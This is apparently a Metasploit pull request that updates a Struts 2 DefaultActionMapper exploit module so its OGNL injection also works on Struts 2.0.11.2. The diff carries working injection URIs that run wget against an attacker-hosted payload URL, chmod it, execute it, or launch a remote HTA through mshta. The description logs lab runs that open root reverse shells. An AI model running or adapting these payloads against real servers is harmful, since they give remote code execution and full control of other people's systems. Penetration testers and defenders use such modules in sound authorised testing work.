### PR TITLE
[SeeRM #8693] Make OGNL expressions compatible with struts 2.0.11.2

### DIFF
--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
     proof = rand_text_alpha(6 + rand(4))
 
     res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}",
       'method' => 'GET'
     })
 
-    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
+    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
     proof = rand_text_alpha(6 + rand(4))
 
     res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
       'method' => 'GET'
     })
 
@@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
     fname = "#{fname}/" unless fname =~ %r'/$'
     fname << downfile
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")
 
@@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # chmod
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Make payload executable...")
 
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # execute
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
+    uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
 
     print_status("#{rhost}:#{rport} - Execute payload...")
 
@@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # execute hta
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")
 

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
         evaluated as OGNL expression against the value stack, this introduces the
         possibility to inject server side code.
 
-        This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
-        Windows 2003 SP2 and Ubuntu 10.04 operating systems.
+        This module has been tested successfully on Struts 2.3.15 and Struts 2.0.11.2 over
+        Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>


### PR DESCRIPTION
History here: http://dev.metasploit.com/redmine/issues/8693

The proposed patch makes ognl expressions compatible with 2.0.11.2 indeed :)

Verification steps:
- [x] Install tomcat 7
- [x] Install struts2-blank from struts 2.3.15 and 2.0.11.2
- [x] Run the module like on the Test section, enjoy sessions targeting both versions:

Test:
- struts 2.3.15

```
msf exploit(struts_default_action_mapper) > show options

Module options (exploit/multi/http/struts_default_action_mapper):

   Name         Current Setting                           Required  Description
   ----         ---------------                           --------  -----------
   HTTP_DELAY   60                                        yes       Time that the HTTP Server will wait for the payload request
   Proxies                                                no        Use a proxy chain
   RHOST        192.168.172.134                           yes       The target address
   RPORT        8080                                      yes       The target port
   SRVHOST      0.0.0.0                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                                      yes       The local port to listen on.
   SSLCert                                                no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /struts2-blank/example/HelloWorld.action  yes       Action URI
   URIPATH                                                no        The URI to use for this exploit (default is random)
   VHOST                                                  no        HTTP server virtual host
   WritableDir  /tmp                                      yes       A directory where we can write files (only on Linux targets)


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(struts_default_action_mapper) > check
[+] The target is vulnerable.
rmsf exploit(struts_default_action_mapper) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.134:8080 - Target autodetection...
[+] 192.168.172.134:8080 - Linux target found!
[*] 192.168.172.134:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.134:8080 - Downloading payload to /tmp/dQkCpiVhbLUgW...
[*] 192.168.172.134:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.134:8080 - Sending the payload to the server...
[*] 192.168.172.134:8080 - Make payload executable...
[*] 192.168.172.134:8080 - Execute payload...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 5 opened (192.168.172.1:4444 -> 192.168.172.134:46633) at 2013-11-20 12:46:11 -0600
[+] Deleted /tmp/dQkCpiVhbLUgW
[*] Server stopped.

3641057079
YtlGuaegmuWoCpeKoHoFXWsHcQKQqoLP
KlbTUeCMzRPaDDLiQwBMjAMwGwIsMumT
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 5? [y/N]  y

[*] 192.168.172.134 - Command shell session 5 closed.  Reason: User exit
msf exploit(struts_default_action_mapper) > 
```
- 2.0.11.2

```
msf exploit(struts_default_action_mapper) > set TARGETURI /struts2-blank-2.0.11.2/example/HelloWorld.action
TARGETURI => /struts2-blank-2.0.11.2/example/HelloWorld.action
msf exploit(struts_default_action_mapper) > reload
[*] Reloading module...
check
exploit
msf exploit(struts_default_action_mapper) > check
[+] The target is vulnerable.
msf exploit(struts_default_action_mapper) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.134:8080 - Target autodetection...
[+] 192.168.172.134:8080 - Linux target found!
[*] 192.168.172.134:8080 - Starting up our web service on 192.168.172.1:8080 ...
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://10.6.0.165:8080/
[*] 192.168.172.134:8080 - Downloading payload to /tmp/eAdDqyaBBRDS...
[*] 192.168.172.134:8080 - Waiting for the victim to request the payload...
[*] 192.168.172.134:8080 - Sending the payload to the server...
[*] 192.168.172.134:8080 - Make payload executable...
[*] 192.168.172.134:8080 - Execute payload...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 6 opened (192.168.172.1:4444 -> 192.168.172.134:46635) at 2013-11-20 12:46:39 -0600
[+] Deleted /tmp/eAdDqyaBBRDS
[*] Server stopped.

501868376
bbJwAxArRushFuQTXGRgxzwwdZGVOaCB
YOMVVJQRLhGUSbYXSBWEpsxvTgHOwRlQ
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 6? [y/N]  y

[*] 192.168.172.134 - Command shell session 6 closed.  Reason: User exit
```
